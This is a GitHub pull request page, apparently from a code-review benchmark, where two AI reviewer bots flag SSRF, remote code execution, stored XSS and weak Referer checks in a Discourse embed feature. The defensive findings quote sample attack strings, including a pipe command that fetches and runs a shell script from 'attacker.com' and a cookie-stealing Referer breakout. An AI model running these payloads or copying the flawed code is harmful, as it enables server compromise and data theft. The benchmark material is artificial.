Enhance embed URL handling and validation system by camcalaquian · Pull Request #76 · codereview-benchmark/discourse

camcalaquian · 2026-04-29T13:53:36Z

…f feedzirra

tenki-reviewer · 2026-04-29T13:53:51Z

Tenki Code Review - Complete

Files Reviewed: 28
Findings: 14

By Severity:

🚨 Critical: 3
🔴 High: 8
🟠 Medium: 3

PR #76 introduces embeddable Discourse comments with critical security and data flow vulnerabilities. The feature allows remote content retrieval via user-controlled embed_url parameters and storing/rendering fetched HTML as raw (unsanitized) content. Multiple attack vectors exist: SSRF via Kernel#open that can reach internal services or execute shell commands from malicious URLs, stored XSS from fetched HTML rendered without sanitization, Referer-header-only access control that is trivially bypassable, and improper post rendering that injects Referer values directly into JavaScript. These issues must be fixed before merging.

Files Reviewed (28 files)

Gemfile
Gemfile_rails4.lock
app/assets/javascripts/embed.js
app/assets/stylesheets/embed.css.scss
app/controllers/embed_controller.rb
app/jobs/regular/retrieve_topic.rb
app/jobs/scheduled/poll_feed.rb
app/models/post.rb
app/models/topic_embed.rb
app/views/embed/best.html.erb
app/views/embed/loading.html.erb
app/views/layouts/embed.html.erb
config/locales/client.en.yml
config/locales/server.en.yml
config/routes.rb
config/site_settings.yml
db/migrate/20131210181901_migrate_word_counts.rb
db/migrate/20131217174004_create_topic_embeds.rb
db/migrate/20131219203905_add_cook_method_to_posts.rb
db/migrate/20131223171005_create_top_topics.rb
lib/post_creator.rb
lib/post_revisor.rb
lib/tasks/disqus.thor
lib/topic_retriever.rb
spec/components/topic_retriever_spec.rb
spec/controllers/embed_controller_spec.rb
spec/jobs/poll_feed_spec.rb
spec/models/topic_embed_spec.rb

tenki-reviewer

Overview

PR #76 implements embeddable Discourse comments — a feature allowing external websites to embed Discourse topics as iframes. The implementation includes:

A new EmbedController endpoint (/embed/best?embed_url=...)
Remote content fetching via RSS feeds (PollFeed) or direct HTTP import (TopicEmbed.import_remote)
A new raw_html cook method to skip HTML sanitization for imported content
Referer-header-based access control

Critical Security Issues

1. SSRF & RCE via Ruby's `Kernel#open` (3 findings)

The feature uses open(url) to fetch remote content, which is extremely dangerous:

Kernel#open accepts shell commands: URLs starting with | are executed as shell commands. A Disqus XML file containing <link>|curl attacker.sh | bash</link> would run arbitrary code on the server.
SSRF to internal services: open() also accepts file:// URIs and non-HTTP schemes, allowing reads from /etc/passwd, AWS metadata endpoints (169.254.169.254), or internal databases.
Redirect-following without host validation: open-uri follows HTTP redirects by default. Even though TopicRetriever checks the original URL's host against embeddable_host, redirects to internal IPs are not blocked.

Impact: Remote Code Execution, data exfiltration, internal network enumeration.

Fix: Replace open(url) with URI.open(url) (from OpenURI) or explicit Net::HTTP, validate URL schemes, and either disable redirects or re-validate redirect destinations.

2. Stored XSS from Unsanitized Fetched HTML (2 findings)

Remote HTML is fetched, stored with cook_method: :raw_html, and rendered with <%= raw post.cooked %>.
The Post#cook method bypasses all sanitization when cook_method == :raw_html, returning the raw content verbatim.
Attacker-controlled content from RSS feeds or the embed_url parameter can inject <script> tags, javascript: URLs, or event handlers.
Readability's tag allowlist in import_remote doesn't prevent javascript: hrefs or <img onerror=...> injections.

Impact: Stored XSS in all views of the embed iframe. Malicious JavaScript executes in the viewer's browser.

Fix: Use Rails sanitize helper with an explicit allowlist, or run HTML through Loofah before rendering.

3. Referer-Only Access Control (Easily Spoofed)

The entire access gate relies on the HTTP Referer header:

Referer is trivially spoofed in any HTTP client
Suppressed by privacy-oriented browsers and HTTPS→HTTP downgrades
An attacker can forge Referer: https://embeddable_host/ and invoke SSRF attacks

Fix: Implement token-based access (HMAC-signed URLs or session tokens) instead of Referer validation.

4. Referer Header Injection into JavaScript

The embed layout interpolates request.referer directly into a JavaScript string literal used for postMessage targetOrigin:

parent.postMessage({...}, '<%= request.referer %>');  // VULNERABLE

A crafted Referer like '); alert(document.cookie); (' breaks out of the string and executes arbitrary JavaScript.

Fix: Use the configured embeddable_host as the targetOrigin, and always escape with j (escape_javascript) helper if dynamic values are needed.

5. Non-Standard Framing Header

X-Frame-Options: ALLOWALL is not recognized by modern browsers and provides no clickjacking protection.

Fix: Use ALLOW-FROM https://embeddable_host or Content-Security-Policy: frame-ancestors.

High-Priority Code Quality Issues

Non-Atomic Redis SETNX + EXPIRE

Throttle logic uses two separate Redis commands. If the process crashes between them, the key is set but never expires, permanently blocking all future retrieval for that URL.

Fix: Use atomic SET key value EX 60 NX instead.

Post Creation Failures Not Guarded

In disqus.thor, the loop reassigns post variable without nil checks. If PostCreator.create fails (returns nil), accessing post.post_number raises NoMethodError and crashes the import.

Fix: Add nil checks and use separate variable names (topic_post vs reply_post).

Missing Nil Checks on RSS Feed Content

i.content.scrub without a guard causes a crash if the RSS item lacks a content field. The job exits before processing remaining items.

Fix: Use (i.content || i.summary || i.description || '').scrub.

PostRevisor Save Not Guarded

When @post.save(validate: ...) returns false due to validation, save_reply_relationships still runs on an unsaved post, creating stale DB records.

Fix: Guard the call on save success: saved = @post.save(...); @post.save_reply_relationships if saved.

String Mutation and Hardcoded Port Logic

Minor bugs in URL processing and string handling that can cause spurious revisions and incorrect URL reconstruction.

Authorization & Privilege Escalation

The cook_method parameter is settable from PostCreator opts without an authorization check. Although the web controller's params whitelist currently excludes it, internal code paths or future API additions could expose this, allowing end users to bypass all HTML sanitization.

Fix: Guard the assignment: post.cook_method = ... if @opts[:cook_method].present? && (@user.try(:staff?) || @opts[:skip_validations]).

Summary of Assessment

**This PR introduces multiple CRITICAL vulnerabilities that enable:

Remote Code Execution via malicious Disqus XML or attacker-controlled embed URLs
Stored XSS attacks delivering malicious scripts to all topic viewers
SSRF to internal services (AWS metadata, databases, etc.)
Trivially spoofable access control

Recommendation: Request Changes. Do not merge until all critical issues (SSRF, RCE, Stored XSS, access control) are addressed. The feature is architecturally risky — fetching and rendering arbitrary remote HTML inherently requires bulletproof sanitization, strict URL validation, and secure HTTP clients.

tenki-reviewer · 2026-04-29T14:01:27Z

+    if topic_id
+      @topic_view = TopicView.new(topic_id, current_user, {best: 5})
+    else
+      Jobs.enqueue(:retrieve_topic, user_id: current_user.try(:id), embed_url: embed_url)


🚨 SSRF via user-controlled embed_url triggers open() to arbitrary URL (security)

In EmbedController#best (line 9), the embed_url parameter comes directly from user-supplied query parameters. When no existing topic embed is found, this value is passed verbatim to Jobs.enqueue(:retrieve_topic, embed_url: embed_url). Inside Jobs::RetrieveTopic#execute, it is passed to TopicRetriever.new(@embed_url), which calls TopicEmbed.import_remote(user, @embed_url), which calls open(url).read (Ruby's Kernel#open / open-uri). Although TopicRetriever#invalid_host? checks that the URL's host matches SiteSetting.embeddable_host, this check only runs for pre-validated embeds after the job is enqueued — the URL is already accepted by the controller before any host validation occurs (the controller only checks the HTTP Referer header, not the embed_url itself). More critically, Kernel#open also accepts pipe-prefixed strings (|command) on older Ruby/open-uri combinations that allow OS command execution. Even if host validation were reliable, a URL with a valid host prefix but path traversal (e.g. query string exploits) can reach internal services.

💡 Suggestion: Validate embed_url against the configured embeddable_host in the controller before enqueuing the job, not just in the retriever. Use URI.parse and compare the host explicitly, and reject any URL whose scheme is not http or https. Additionally, replace open(url) in import_remote with Net::HTTP or a whitelisted HTTP client that cannot be used for file/pipe access.

📋 Prompt for AI Agents

In app/controllers/embed_controller.rb, before calling Jobs.enqueue at line 15, add host validation of embed_url: parse it with URI.parse, verify the scheme is http/https and the host matches SiteSetting.embeddable_host, and raise Discourse::InvalidAccess if either check fails. In app/models/topic_embed.rb at line 48, replace open(url).read with an explicit HTTP fetch using Net::HTTP or Faraday so that file:// and pipe-exec URIs are never processed.

tenki-reviewer · 2026-04-29T14:01:27Z

+    require 'ruby-readability'
+
+    opts = opts || {}
+    doc = Readability::Document.new(open(url).read,


🚨 SSRF and RCE via Kernel#open with attacker-controlled URL from Disqus XML (security)

The PR replaces PostCreator with TopicEmbed.import_remote(user, t[:link], ...) at line 148. The value t[:link] is read directly from the <link> element of the Disqus XML export file (parsed at disqus.thor:58). Inside TopicEmbed.import_remote (topic_embed.rb:48), Ruby's Kernel#open(url) is called with this attacker-controlled value before any URL validation.

Ruby's Kernel#open has two critical behaviours beyond HTTP:

Remote Code Execution: if the URL begins with |, it is interpreted as a shell command. A Disqus XML containing <link>|curl attacker.com/shell.sh | bash</link> would execute arbitrary shell commands on the import host.

SSRF / local file read: URLs with file:// scheme or internal addresses (e.g., http://169.254.169.254/) allow reading arbitrary local files or probing internal services.

The https?:// guard in TopicEmbed.import (line 11) does NOT protect against this because open(url) in import_remote is called at line 48 before import is invoked at line 52. The TopicRetriever code path validates the host against SiteSetting.embeddable_host, but the Disqus importer bypasses that validation entirely.

💡 Suggestion: Replace Kernel#open(url) with an explicit HTTP client call (e.g., Net::HTTP.get(URI(url)) or open-uri with explicit URI.open) and validate the URL scheme before fetching. Add a guard at the start of import_remote that rejects non-http(s) URLs (matching the guard already present in import). Additionally, validate t[:link] in disqus.thor before passing it to import_remote.

Suggested change

doc = Readability::Document.new(open(url).read,

doc = Readability::Document.new(URI.open(url).read,

📋 Prompt for AI Agents

In app/models/topic_embed.rb, the import_remote method at line 44 uses Ruby's Kernel#open(url) at line 48 to fetch a URL that can originate from an attacker-controlled Disqus XML file (via lib/tasks/disqus.thor line 148). Ruby's Kernel#open executes shell commands when the string starts with '|', enabling RCE. Fix this by: (1) adding a URL scheme check at the top of import_remote identical to the one in import (line 11): return unless url =~ /^https?:\/\//; (2) replacing open(url) with URI.open(url) (from OpenURI) or an explicit Net::HTTP call to avoid the shell-dispatch behaviour of Kernel#open. Also add require 'open-uri' if not already present.

tenki-reviewer · 2026-04-29T14:01:27Z

+  def self.import(user, url, title, contents)
+    return unless url =~ /^https?\:\/\//
+
+    contents << "\n<hr>\n<small>#{I18n.t('embed.imported_from', link: "<a href='#{url}'>#{url}</a>")}</small>\n"


🔴 Mutating contents parameter in-place causes double-appended footer on repeated calls (bug)

In TopicEmbed.import (line 13), `contents << "

..."` mutates the string argument in place. The SHA1 (line 16) is computed *after* the mutation, so the stored SHA1 always includes the footer. If a caller ever passes the same mutable string on a second call (or if the same string object is reused), the footer will be appended again before the SHA1 comparison, producing a different hash and triggering a spurious `PostRevisor` revision even when the upstream content has not changed.
💡 Suggestion: Avoid mutating the caller's string. Build the full content as a new local variable before computing the SHA1 and passing it downstream.

Suggested change

contents << "\n<hr>\n<small>#{I18n.t('embed.imported_from', link: "<a href='#{url}'>#{url}</a>")}</small>\n"

full_contents = contents + "\n<hr>\n<small>#{I18n.t('embed.imported_from', link: "<a href='#{url}'>#{url}</a>")}</small>\n"

📋 Prompt for AI Agents

In app/models/topic_embed.rb at line 13, replace contents << "\n<hr>..." with full_contents = contents + "\n<hr>..." (use + instead of << to avoid mutating the caller's string). Then update all subsequent uses of contents in this method (lines 16, 22, 36) to use full_contents instead, so the SHA1 and the post body both reflect the footer-appended version without side-effecting the caller.

tenki-reviewer · 2026-04-29T14:01:27Z

+        <img src='<%= post.user.small_avatar_url %>'>
+        <h3><%= post.user.username %></h3>
+      </div>
+      <div class='cooked'><%= raw post.cooked %></div>


🚨 Stored XSS: externally-fetched HTML stored and rendered without sanitization (security)

Content retrieved from the remote embed_url via Readability::Document is passed through TopicEmbed.import where it is stored with cook_method: Post.cook_methods[:raw_html]. In Post#cook (post.rb line 133), when cook_method is :raw_html the method simply returns self.raw — the unsanitized HTML string. This cooked value is then rendered in best.html.erb line 19 using Rails' raw helper (<%= raw post.cooked %>), bypassing all output encoding. An attacker who controls the content at embed_url (or who can perform a MITM / DNS rebind) can inject arbitrary JavaScript that executes in the origin of the Discourse embed iframe. Readability's tag/attribute allowlist in import_remote provides some mitigation but does NOT prevent javascript: href values, <script> tags included via other vectors, or <img onerror=...> injections since onerror is not in the excluded attribute list.

💡 Suggestion: Do not use raw to render imported HTML. Run post.cooked through a strict HTML sanitizer (e.g., Rails Sanitize helper with an explicit allowlist, or Loofah) before rendering. Alternatively, store the Readability-sanitized content at import time and validate it on retrieval.

Suggested change

<div class='cooked'><%= raw post.cooked %></div>

<div class='cooked'><%= sanitize post.cooked, tags: %w[p b i em strong a div span h1 h2 h3 h4 h5 h6 ul ol li blockquote pre code img br hr], attributes: %w[href src class alt title target] %></div>

📋 Prompt for AI Agents

In app/views/embed/best.html.erb at line 19, replace <%= raw post.cooked %> with <%= sanitize post.cooked, tags: %w[p b i em strong a div span h1 h2 h3 h4 h5 h6 ul ol li blockquote pre code img br hr], attributes: %w[href src class alt title target] %> to prevent stored XSS from externally-fetched HTML rendered without encoding.

tenki-reviewer · 2026-04-29T14:01:27Z

+      if $redis.setnx(retrieved_key, "1")
+        $redis.expire(retrieved_key, 60)
+        return false
+      end


🔴 Non-atomic Redis SETNX + EXPIRE creates permanent throttle lock on crash (bug)

In retrieved_recently? (lines 27-28), $redis.setnx(retrieved_key, "1") and $redis.expire(retrieved_key, 60) are two separate commands. If the process is killed, an exception is raised, or the Redis connection drops between the two calls, the key is set but never gets an expiry. As a result, setnx will always return false for that URL from that point on, permanently suppressing topic retrieval for it — the throttle becomes an eternal lock.

The fix is to use SET key value EX 60 NX (available via $redis.set(key, '1', ex: 60, nx: true) with redis-rb >= 3.x), which is atomic.

💡 Suggestion: Replace the two-step SETNX + EXPIRE with a single atomic SET key value EX seconds NX call: $redis.set(retrieved_key, '1', ex: 60, nx: true). This is atomic and eliminates the race condition.

📋 Prompt for AI Agents

In lib/topic_retriever.rb, the retrieved_recently? method (lines 27-30) uses a non-atomic SETNX + EXPIRE pattern. Replace the two-step call with a single atomic SET NX EX call:

Change:
if $redis.setnx(retrieved_key, "1")
$redis.expire(retrieved_key, 60)
return false
end

To:
if $redis.set(retrieved_key, "1", ex: 60, nx: true)
return false
end

This prevents a permanent lock if the process crashes between the setnx and expire calls.

tenki-reviewer · 2026-04-29T14:01:27Z

+
+    def ensure_embeddable
+      raise Discourse::InvalidAccess.new('embeddable host not set') if SiteSetting.embeddable_host.blank?
+      raise Discourse::InvalidAccess.new('invalid referer host') if URI(request.referer || '').host != SiteSetting.embeddable_host


🔴 Referer-only authentication for embed endpoint is trivially bypassable (security)

The ensure_embeddable filter in EmbedController (lines 25-26) relies exclusively on the HTTP Referer header to verify that requests come from the configured embeddable host. The Referer header is: (1) easily spoofed in any HTTP client, (2) not sent by many privacy-oriented browsers/extensions, and (3) stripped by HTTPS→HTTP downgrades. An attacker can craft a request from anywhere with Referer: https://embeddable_host/ to pass this check and invoke Jobs.enqueue(:retrieve_topic, embed_url: attacker_url), triggering an SSRF to any URL that passes TopicRetriever#invalid_host?. Combined with the SSRF finding (sec-001), this amplifies the attack surface.

💡 Suggestion: Do not rely on the Referer header as a security control. Implement an embed token or HMAC-signed URL scheme where the embedding page includes a server-issued token that the Discourse server verifies. Additionally, validate the embed_url parameter against the configured host independently of the Referer check.

📋 Prompt for AI Agents

In app/controllers/embed_controller.rb, the ensure_embeddable filter (lines 24-31) uses only the HTTP Referer header for access control. Add a secondary control: validate that params[:embed_url] (when present) has a host matching SiteSetting.embeddable_host, and consider issuing HMAC-signed embed tokens that are verified server-side instead of trusting the Referer header.

tenki-reviewer · 2026-04-29T14:01:27Z

      post.send("#{a}=", @opts[a]) if @opts[a].present?
    end

+    post.cook_method = @opts[:cook_method] if @opts[:cook_method].present?


🔴 Unsanitized cook_method from opts allows raw HTML bypass in PostCreator (security)

The new line post.cook_method = @opts[:cook_method] if @opts[:cook_method].present? in PostCreator#setup_post (lib/post_creator.rb:216) allows any caller that can supply opts to set the post's cook_method. When cook_method equals Post.cook_methods[:raw_html], the Post#cook method bypasses the entire sanitization pipeline and returns the raw content verbatim (app/models/post.rb:133). There is no authorization check ensuring only privileged callers can set this value. The TopicEmbed.import path (app/models/topic_embed.rb:22) intentionally uses cook_method: Post.cook_methods[:raw_html] with content fetched from a remote URL — any XSS in that remote content will be stored and served as-is. If a future API path or a bypassed controller exposes this parameter to end users, it becomes a stored XSS vulnerability. The posts_controller.rb#create_params currently excludes cook_method from the permitted params whitelist, but no enforcement is done inside PostCreator itself.

💡 Suggestion: Guard the cook_method assignment behind an authorization check. Only staff/system users or internal callers should be allowed to set cook_method to raw_html. Add a check such as: if @opts[:cook_method].present? && (@user.try(:staff?) || @opts[:skip_validations]) then post.cook_method = @opts[:cook_method] end. Alternatively, validate that the supplied cook_method value is not raw_html unless the caller is trusted.

Suggested change

post.cook_method = @opts[:cook_method] if @opts[:cook_method].present?

post.cook_method = @opts[:cook_method] if @opts[:cook_method].present? && (@user.try(:staff?) || @opts[:skip_validations])

📋 Prompt for AI Agents

In lib/post_creator.rb at line 216, the assignment post.cook_method = @opts[:cook_method] if @opts[:cook_method].present? allows any caller to set cook_method to raw_html, which bypasses HTML sanitization in Post#cook. Restrict this assignment to trusted callers only: change the line to post.cook_method = @opts[:cook_method] if @opts[:cook_method].present? && (@user.try(:staff?) || @opts[:skip_validations]). This ensures that only staff users or internal system calls (which already use skip_validations: true) can request raw HTML rendering, preventing a future API exposure from becoming a stored XSS vector.

tenki-reviewer · 2026-04-29T14:01:27Z

+    @post.save(validate: !@opts[:skip_validations])
+
    @post.save_reply_relationships


🟠 save_reply_relationships called unconditionally even when save fails (bug)

In update_post (lines 85-87 of post_revisor.rb), @post.save(validate: !@opts[:skip_validations]) can return false if the post fails validation (i.e., when skip_validations is falsy). Despite this, @post.save_reply_relationships is always called on the next line regardless of whether the save succeeded.

save_reply_relationships queries and creates PostReply records based on @post.quoted_post_numbers. If the post was not actually saved (or was saved in a dirty state), these relationships may be created for a post whose content was not persisted, leading to stale or incorrect reply relationships in the database.

Note: the original code had @post.save (always validates, always succeeds or raises), so this bug is introduced by the new validate: option.

💡 Suggestion: Guard save_reply_relationships with a check on the save result: if @post.save(validate: !@opts[:skip_validations]); @post.save_reply_relationships; end. Alternatively, raise or return early on save failure consistent with the rest of the codebase.

📋 Prompt for AI Agents

In lib/post_revisor.rb, the update_post method (lines 85-87) calls @post.save_reply_relationships unconditionally after @post.save(validate: ...). If save returns false due to validation errors, reply relationships are still created for an unsaved post.

Change lines 85-87 from:
@post.save(validate: !@opts[:skip_validations])

@post.save_reply_relationships

To:
saved = @post.save(validate: !@opts[:skip_validations])
@post.save_reply_relationships if saved

This ensures that reply relationships are only written to the database when the post was actually saved successfully.

tenki-reviewer · 2026-04-29T14:01:27Z

+  def self.absolutize_urls(url, contents)
+    uri = URI(url)
+    prefix = "#{uri.scheme}://#{uri.host}"
+    prefix << ":#{uri.port}" if uri.port != 80 && uri.port != 443


🟠 Port-stripping logic in absolutize_urls uses hardcoded ports instead of scheme-relative defaults (bug)

In app/models/topic_embed.rb line 59, the port is omitted from the constructed prefix only when uri.port != 80 && uri.port != 443. This hardcodes port numbers rather than comparing against the URI's default port for the given scheme. For example, an http:// URL using port 443 would have its port silently dropped from the prefix (since 443 is excluded), producing an incorrect base URL. The semantically correct check is uri.port != uri.default_port.

💡 Suggestion: Replace the hardcoded port check with uri.port != uri.default_port to correctly handle non-standard port combinations.

Suggested change

prefix << ":#{uri.port}" if uri.port != 80 && uri.port != 443

prefix << ":#{uri.port}" if uri.port != uri.default_port

📋 Prompt for AI Agents

In app/models/topic_embed.rb at line 59, replace if uri.port != 80 && uri.port != 443 with if uri.port != uri.default_port. The URI#default_port method returns the scheme-appropriate default port (80 for http, 443 for https), making this correct for all URI schemes rather than hardcoding two magic numbers.

tenki-reviewer · 2026-04-29T14:01:27Z

+
+      # First check RSS if that is enabled
+      if SiteSetting.feed_polling_enabled?
+        Jobs::PollFeed.new.execute({})


🟠 Synchronous PollFeed.new.execute({}) blocks caller and polls entire feed for one URL (performance)

In perform_retrieve (line 41), Jobs::PollFeed.new.execute({}) is called synchronously. PollFeed#execute makes an outbound HTTP request to fetch the RSS feed URL, then iterates over all feed items and imports them via TopicEmbed.import. This entire blocking operation happens inline — potentially from a web request context — and is not bounded by the specific @embed_url being retrieved. It polls the entire feed just to check if one URL now exists. If the feed URL is slow or unavailable, the caller hangs.

💡 Suggestion: Enqueue the job asynchronously (Jobs.enqueue(:poll_feed)) instead of calling execute directly, then return immediately. Accept that the embed may appear on the next poll cycle rather than the same request.

📋 Prompt for AI Agents

In lib/topic_retriever.rb line 41, Jobs::PollFeed.new.execute({}) is called synchronously, which blocks the caller thread with an outbound HTTP request and a full feed import loop.

Change line 41 from:
Jobs::PollFeed.new.execute({})

To:
Jobs.enqueue(:poll_feed)

This schedules the poll asynchronously so the caller is not blocked by network I/O or long import work. The embed will be available after the job completes rather than immediately, which is the appropriate behavior for a background retrieval system.

devin-ai-integration

Devin Review found 4 potential issues.

View 6 additional findings in Devin Review.

devin-ai-integration · 2026-04-30T13:45:18Z

+    <%= link_to(I18n.t('embed.title'), @topic_view.topic.url, class: 'button', target: '_blank') %>
+  <%- else %>
+    <%= link_to(I18n.t('embed.start_discussion'), @topic_view.topic.url, class: 'button', target: '_blank') %>
+  <%- end if %>


🟡 ERB template end if typo creates accidental postfix conditional

On line 6 of best.html.erb, <%- end if %> should be <%- end %>. In the generated Ruby code, end if becomes a postfix conditional: Ruby parses it as end if <next_erb_output_expression>, where the next expression (the buffer append for the whitespace/link_to on the following lines) is always truthy. This means the if/else block executes correctly by accident, but the if is clearly unintentional. It also causes the condition expression (next output) to be evaluated before the if/else block (Ruby evaluates the postfix if condition first), subtly reordering output.

Suggested change

<%- end if %>

<%- end %>

Was this helpful? React with 👍 or 👎 to provide feedback.

devin-ai-integration · 2026-04-30T13:45:19Z

+        url = i.link
+        url = i.id if url.blank? || url !~ /^https?\:\/\//
+
+        content = CGI.unescapeHTML(i.content.scrub)


🔴 NoMethodError when RSS feed items lack content element

i.content will be nil for RSS feeds that use <description> instead of <content> (which is very common in RSS 2.0 feeds). Calling .scrub on nil raises NoMethodError: undefined method 'scrub' for nil:NilClass, which crashes the entire poll_feed scheduled job and prevents any feed items from being imported.

Suggested change

content = CGI.unescapeHTML(i.content.scrub)

content = CGI.unescapeHTML((i.content || i.description).scrub)

Was this helpful? React with 👍 or 👎 to provide feedback.

devin-ai-integration · 2026-04-30T13:45:20Z

+  def self.import(user, url, title, contents)
+    return unless url =~ /^https?\:\/\//
+
+    contents << "\n<hr>\n<small>#{I18n.t('embed.imported_from', link: "<a href='#{url}'>#{url}</a>")}</small>\n"


🔴 URL interpolated into HTML without escaping enables XSS in raw_html posts

The url parameter is directly interpolated into an HTML <a> tag using single-quoted attributes: <a href='#{url}'>#{url}</a>. If the URL contains a single quote (e.g. http://example.com/?x=' onclick='alert(1)), it breaks out of the href attribute and can inject arbitrary HTML attributes like event handlers. This content passes through absolutize_urls (Nokogiri preserves the injected attributes), then is stored as a raw_html post where Post#cook returns the raw content directly (app/models/post.rb:133). The content is then rendered unescaped via <%= raw post.cooked %> in app/views/embed/best.html.erb:19. An attacker who controls RSS feed item URLs or crafts a malicious embed URL can inject XSS into the Discourse application.

Prompt for agents

In TopicEmbed.import (app/models/topic_embed.rb:13), the url parameter is interpolated directly into an HTML string without HTML-escaping. This creates XSS risk because URLs can contain single quotes that break out of the href attribute. The url is used in two contexts: as an href attribute value and as visible text content. Both need to be HTML-escaped. The fix should use ERB::Util.html_escape (aliased as h or ERB::Util.h) to escape the URL before interpolation. For example: safe_url = ERB::Util.html_escape(url) contents << "\n<hr>\n<small>#{I18n.t('embed.imported_from', link: "<a href='#{safe_url}'>#{safe_url}</a>")}</small>\n" Alternatively, switch to double quotes for the href attribute to match Nokogiri's serialization style, and still escape the URL.

Was this helpful? React with 👍 or 👎 to provide feedback.

devin-ai-integration · 2026-04-30T13:45:22Z

+
+  function postMessageReceived(e) {
+    if (!e) { return; }
+    if (discourseUrl.indexOf(e.origin) === -1) { return; }


🟡 postMessage origin check uses indexOf allowing prefix-matching origins

The origin validation discourseUrl.indexOf(e.origin) === -1 checks whether e.origin is a substring of discourseUrl. This means any origin that is a prefix of the Discourse URL passes the check. For example, if discourseUrl is http://discourse.example.com/, an attacker's origin http://discourse.example.co (a different domain) would pass because indexOf returns 0. The correct approach is to compare origins directly, e.g. by extracting the origin from discourseUrl and comparing with strict equality.

Suggested change

if (discourseUrl.indexOf(e.origin) === -1) { return; }

if (discourseUrl.replace(/\/$/, '') !== e.origin) { return; }

Was this helpful? React with 👍 or 👎 to provide feedback.

FEATURE: Embeddable Discourse comments, now with simple-rss instead o…

4f8aed2

…f feedzirra

tenki-reviewer Bot reviewed Apr 29, 2026

View reviewed changes

camcalaquian marked this pull request as draft April 30, 2026 13:36

camcalaquian marked this pull request as ready for review April 30, 2026 13:37

devin-ai-integration Bot reviewed Apr 30, 2026

View reviewed changes

	doc = Readability::Document.new(open(url).read,
	doc = Readability::Document.new(URI.open(url).read,

	contents << "\n<hr>\n<small>#{I18n.t('embed.imported_from', link: "<a href='#{url}'>#{url}</a>")}</small>\n"
	full_contents = contents + "\n<hr>\n<small>#{I18n.t('embed.imported_from', link: "<a href='#{url}'>#{url}</a>")}</small>\n"

	<div class='cooked'><%= raw post.cooked %></div>
	<div class='cooked'><%= sanitize post.cooked, tags: %w[p b i em strong a div span h1 h2 h3 h4 h5 h6 ul ol li blockquote pre code img br hr], attributes: %w[href src class alt title target] %></div>

	post.cook_method = @opts[:cook_method] if @opts[:cook_method].present?
	post.cook_method = @opts[:cook_method] if @opts[:cook_method].present? && (@user.try(:staff?) \|\| @opts[:skip_validations])

		@post.save(validate: !@opts[:skip_validations])

		@post.save_reply_relationships

	prefix << ":#{uri.port}" if uri.port != 80 && uri.port != 443
	prefix << ":#{uri.port}" if uri.port != uri.default_port

	content = CGI.unescapeHTML(i.content.scrub)
	content = CGI.unescapeHTML((i.content \|\| i.description).scrub)

	if (discourseUrl.indexOf(e.origin) === -1) { return; }
	if (discourseUrl.replace(/\/$/, '') !== e.origin) { return; }

Conversation

camcalaquian commented Apr 29, 2026 • edited by devin-ai-integration Bot Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

tenki-reviewer Bot commented Apr 29, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

tenki-reviewer Bot left a comment

Choose a reason for hiding this comment

Overview

Critical Security Issues

1. SSRF & RCE via Ruby's Kernel#open (3 findings)

2. Stored XSS from Unsanitized Fetched HTML (2 findings)

3. Referer-Only Access Control (Easily Spoofed)

4. Referer Header Injection into JavaScript

5. Non-Standard Framing Header

High-Priority Code Quality Issues

Non-Atomic Redis SETNX + EXPIRE

Post Creation Failures Not Guarded

Missing Nil Checks on RSS Feed Content

PostRevisor Save Not Guarded

String Mutation and Hardcoded Port Logic

Authorization & Privilege Escalation

Summary of Assessment

Uh oh!

tenki-reviewer Bot Apr 29, 2026

Choose a reason for hiding this comment

Uh oh!

tenki-reviewer Bot Apr 29, 2026

Choose a reason for hiding this comment

Uh oh!

tenki-reviewer Bot Apr 29, 2026

Choose a reason for hiding this comment

Uh oh!

tenki-reviewer Bot Apr 29, 2026

Choose a reason for hiding this comment

Uh oh!

tenki-reviewer Bot Apr 29, 2026

Choose a reason for hiding this comment

Uh oh!

tenki-reviewer Bot Apr 29, 2026

Choose a reason for hiding this comment

Uh oh!

tenki-reviewer Bot Apr 29, 2026

Choose a reason for hiding this comment

Uh oh!

tenki-reviewer Bot Apr 29, 2026

Choose a reason for hiding this comment

Uh oh!

tenki-reviewer Bot Apr 29, 2026

Choose a reason for hiding this comment

Uh oh!

tenki-reviewer Bot Apr 29, 2026

Choose a reason for hiding this comment

Uh oh!

devin-ai-integration Bot left a comment

Choose a reason for hiding this comment

Uh oh!

devin-ai-integration Bot Apr 30, 2026

Choose a reason for hiding this comment

Uh oh!

devin-ai-integration Bot Apr 30, 2026

Choose a reason for hiding this comment

Uh oh!

devin-ai-integration Bot Apr 30, 2026

Choose a reason for hiding this comment

Uh oh!

devin-ai-integration Bot Apr 30, 2026

Choose a reason for hiding this comment

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

camcalaquian commented Apr 29, 2026 •

edited by devin-ai-integration Bot

Loading

tenki-reviewer Bot commented Apr 29, 2026 •

edited

Loading

1. SSRF & RCE via Ruby's `Kernel#open` (3 findings)